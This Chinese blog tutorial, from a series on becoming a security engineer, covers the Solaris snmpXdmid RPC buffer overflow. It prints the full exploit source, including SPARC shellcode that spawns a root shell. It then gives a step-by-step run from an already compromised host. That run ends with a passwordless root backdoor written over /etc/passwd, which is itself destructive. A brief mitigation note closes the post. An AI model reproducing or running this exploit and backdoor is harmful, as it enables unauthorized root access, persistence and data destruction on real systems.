《30天打造安全工程师》第27天:Sunos(二)

接着昨天的,今天,我们来看看Sunos的远程溢出。

 

本次范例需要的系统及程序情况如下:

操作系统:Window2000 To Sunos 5.8

对方操作系统:Sunos 5.8

程序(一):snmpxdmid.c

本机IP:127.0.0.1

测试IP:127.0.0.29

新程序说明:“snmpxdmid.c”是利用Rpc的snmpxdmid服务写的exploit。

Solaris snmpXdmid 远程缓冲区溢出漏洞:

Solaris 2.6/7/8三个版本都携带了一个名为snmpXdmid的RPC服务,这个服务主要用

于在SNMP管理请求和DMI请求之间建立一种映射/转换关系。

在 UXIX 中,Desktop Management Interface (DMI) 和 SNMP 是两个协调工作的远程管理协议。Sun Microsystems 创建了SNMPxDMID(/usr/lib/dmi/snmpXdmid)映射守护进程来连接这两个协议。此守护进程传输 SNMP 请求给 DMI,但是发现它在处理‘INDICATION’时存在缓冲区溢出问题。本地和远程攻击者利用此漏洞能获得超级用户特权。

测试开始:

telnet ***.***.***.***

* telnet上我的肉鸡。

SunOS 5.8

login: cnhack

Password:

Last login: Sun Jul 29 19:37:19 from 127.0.0.1

Sun Microsystems Inc. SunOS 5.8 Generic February 2000

$

$./usr/man/man5/shell

#

* 取得root权限。

# cat > snmpxdmid.c

* 把exploit贴到主机上。

/*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/

/*## snmpXdmid #*/

/* as the final jump to the assembly code is made to the heap area, this code */

/* also works against machines with non-exec stack protection turned on */

/* due to large data transfers of about 128KB, the code may need some time to */

/* proceed, so be patient */

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/time.h>

#include <netinet/in.h>

#include <rpc/rpc.h>

#include <netdb.h>

#include <unistd.h>

#include <stdio.h>

#include <errno.h>

#define SNMPXDMID_PROG 100249

#define SNMPXDMID_VERS 0x1

#define SNMPXDMID_ADDCOMPONENT 0x101

char findsckcode[]=

“/x20/xbf/xff/xff” /* bn,a <findsckcode-4> */

“/x20/xbf/xff/xff” /* bn,a <findsckcode> */

“/x7f/xff/xff/xff” /* call <findsckcode+4> */

“/x33/x02/x12/x34”

“/xa0/x10/x20/xff” /* mov 0xff,%l0 */

“/xa2/x10/x20/x54” /* mov 0x54,%l1 */

“/xa4/x03/xff/xd0” /* add %o7,-48,%l2 */

“/xaa/x03/xe0/x28” /* add %o7,40,%l5 */

“/x81/xc5/x60/x08” /* jmp %l5+8 */

“/xc0/x2b/xe0/x04” /* stb %g0,[%o7+4] */

“/xe6/x03/xff/xd0” /* ld [%o7-48],%l3 */

“/xe8/x03/xe0/x04” /* ld [%o7+4],%l4 */

“/xa8/xa4/xc0/x14” /* subcc %l3,%l4,%l4 */

“/x02/xbf/xff/xfb” /* bz <findsckcode+32> */

“/xaa/x03/xe0/x5c” /* add %o7,92,%l5 */

“/xe2/x23/xff/xc4” /* st %l1,[%o7-60] */

“/xe2/x23/xff/xc8” /* st %l1,[%o7-56] */

“/xe4/x23/xff/xcc” /* st %l2,[%o7-52] */

“/x90/x04/x20/x01” /* add %l0,1,%o0 */

“/xa7/x2c/x60/x08” /* sll %l1,8,%l3 */

“/x92/x14/xe0/x91” /* or %l3,0x91,%o1 */

“/x94/x03/xff/xc4” /* add %o7,-60,%o2 */

“/x82/x10/x20/x36” /* mov 0x36,%g1 */

“/x91/xd0/x20/x08” /* ta 8 */

“/x1a/xbf/xff/xf1” /* bcc <findsckcode+36> */

“/xa0/xa4/x20/x01” /* deccc %l0 */

“/x12/xbf/xff/xf5” /* bne <findsckcode+60> */

“/xa6/x10/x20/x03” /* mov 0x03,%l3 */

“/x90/x04/x20/x02” /* add %l0,2,%o0 */

“/x92/x10/x20/x09” /* mov 0x09,%o1 */

“/x94/x04/xff/xff” /* add %l3,-1,%o2 */

“/x82/x10/x20/x3e” /* mov 0x3e,%g1 */

“/xa6/x84/xff/xff” /* addcc %l3,-1,%l3 */

“/x12/xbf/xff/xfb” /* bne <findsckcode+112> */

“/x91/xd0/x20/x08” /* ta 8 */

;

char shellcode[]=

“/x20/xbf/xff/xff” /* bn,a <shellcode-4> */

“/x20/xbf/xff/xff” /* bn,a <shellcode> */

“/x7f/xff/xff/xff” /* call <shellcode+4> */

“/x90/x03/xe0/x20” /* add %o7,32,%o0 */

“/x92/x02/x20/x10” /* add %o0,16,%o1 */

“/xc0/x22/x20/x08” /* st %g0,[%o0+8] */

“/xd0/x22/x20/x10” /* st %o0,[%o0+16] */

“/xc0/x22/x20/x14” /* st %g0,[%o0+20] */

“/x82/x10/x20/x0b” /* mov 0x0b,%g1 */

“/x91/xd0/x20/x08” /* ta 8 */

“/bin/ksh”

;

static char nop[]=”/x80/x1c/x40/x11″;

typedef struct{

struct{unsigned int len;char *val;}name;

struct{unsigned int len;char *val;}pragma;

}req_t;

bool_t xdr_req(XDR *xdrs,req_t *objp){

char *v=NULL;unsigned long l=0;int b=1;

if(!xdr_u_long(xdrs,&l)) return(FALSE);

if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);

if(!xdr_bool(xdrs,&b)) return(FALSE);

if(!xdr_u_long(xdrs,&l)) return(FALSE);

if(!xdr_bool(xdrs,&b)) return(FALSE);

if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char),

(xdrproc_t)xdr_char)) return(FALSE);

if(!xdr_bool(xdrs,&b)) return(FALSE);

if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char),

(xdrproc_t)xdr_char)) return(FALSE);

if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);

if(!xdr_u_long(xdrs,&l)) return(FALSE);

return(TRUE);

}

main(int argc,char **argv){

char buffer[140000],address[4],pch[4],*b;

int i,c,n,vers=-1,port=0,sck;

CLIENT *cl;enum clnt_stat stat;

struct hostent *hp;

struct sockaddr_in adr;

struct timeval tm={10,0};

req_t req;

printf(“copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net//n”);

printf(“snmpXdmid for solaris 2.7 2.8 sparc/n/n”);

if(argc<2){

printf(“usage: %s address [-p port] -v 7|8/n”,argv[0]);

exit(-1);

}

while((c=getopt(argc-1,&argv[1],”p:v:”))!=-1){case ‘p’: port=atoi(optarg);break;

case ‘v’: vers=atoi(optarg);

}

}case 7: *(unsigned int*)address=0x000b1868;break;

case 8: *(unsigned int*)address=0x000cf2c0;break;

default: exit(-1);

}

*(unsigned long*)pch=htonl(*(unsigned int*)address+32000);

*(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);

printf(“adr=0x%08x timeout=%d “,ntohl(*(unsigned long*)address),tm.tv_sec);

fflush(stdout);

adr.sin_family=AF_INET;

adr.sin_port=htons(port);

if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){

if((hp=gethostbyname(argv[1]))==NULL){

errno=EADDRNOTAVAIL;perror(“error”);exit(-1);

}

memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);

}

sck=RPC_ANYSOCK;

if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){

clnt_pcreateerror(“error”);exit(-1);

}

cl->cl_auth=authunix_create(“localhost”,0,0,0,NULL);

i=sizeof(struct sockaddr_in);

if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){

struct{unsigned int maxlen;unsigned int len;char *buf;}nb;

ioctl(sck,((‘S'<<8)|2),”sockmod”);

nb.maxlen=0xffff;

nb.len=sizeof(struct sockaddr_in);;

nb.buf=(char*)&adr;

ioctl(sck,((‘T'<<8)|144),&nb);

}

n=ntohs(adr.sin_port);

printf(“port=%d connected! “,n);fflush(stdout);

findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);

findsckcode[12+3]=(unsigned char)(n&0xff);

b=&buffer[0];

for(i=0;i<1248;i++) *b++=pch[i%4];

for(i=0;i<352;i++) *b++=address[i%4];

*b=0;

b=&buffer[10000];

for(i=0;i<64000;i++) *b++=0;

for(i=0;i<64000-188;i++) *b++=nop[i%4];

for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];

for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];

*b=0;

req.name.len=1200+400+4;

req.name.val=&buffer[0];

req.pragma.len=128000+4;

req.pragma.val=&buffer[10000];

stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);

if(stat==RPC_SUCCESS) {printf(“/nerror: not vulnerable/n”);exit(-1);}

printf(“sent!/n”);

write(sck,”/bin/uname -a/n”,14);

while(1){

fd_set fds;

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(sck,&fds);

if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){

int cnt;

char buf[1024];

if(FD_ISSET(0,&fds)){

if((cnt=read(0,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(sck,buf,cnt);

}

if(FD_ISSET(sck,&fds)){

if((cnt=read(sck,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(1,buf,cnt);

}

}

}

}

^D

 

# gcc -o snmpxdmid snmpxdmid.c  -lnsl –lsocket

* 编译exploit。

snmp.c: In function `main’:

snmp.c:135: warning: assignment makes pointer from integer without a cast

snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type

# ./snmpxdmid

* 运行exploit。

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc

usage: ./snmpxdmid  address [-p port] -v 7|8

#./snmpxdmid 127.0.0.29 –v 8

* 溢出。

* 说明:

* address:主机IP地址。

* [-p port]:溢出端口。

* -v 7|8:solaris 2.7 (Sunos 5.7)或者solaris 2.8(Sunos 5.8)

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc

adr=0x000c8f68 timeout=30 port=928 connected!

sent!

SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250

* 溢出成功。

id

uid=0(root) gid=0(root)

* 取得root权限。

echo “cnhack::1:0::/:/bin/bash” > /etc/passwd

* 添加一个用户名为cnhack,密码为空的管理员。

telnet localhost

* telnet主机:127.0.0.29

Trying 127.0.0.1…

Connected to localhost. Escape character is ‘^]’.

SunOS 5.8

login: cnhack

Password:

Last login: Sun Jul 29 19:37:19 from 127.0.0.1

Sun Microsystems Inc. SunOS 5.8 Generic February 2000

$

……

解决方法:

1) 将 /etc/rc .d/S dmi 重命为 /etc/rc .d/K07dmi (此处  代表对应运行级);再执行命令:/etc/init.d/init.dmi stop

2) 保险起见,可改变其用户权限: chmod 000 /usr/lib/dmi/snmpXdmid

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/tech/aiops/53722.html

(0)
上一篇 2021年8月6日 22:34
下一篇 2021年8月6日 22:34

相关推荐

发表回复

登录后才能评论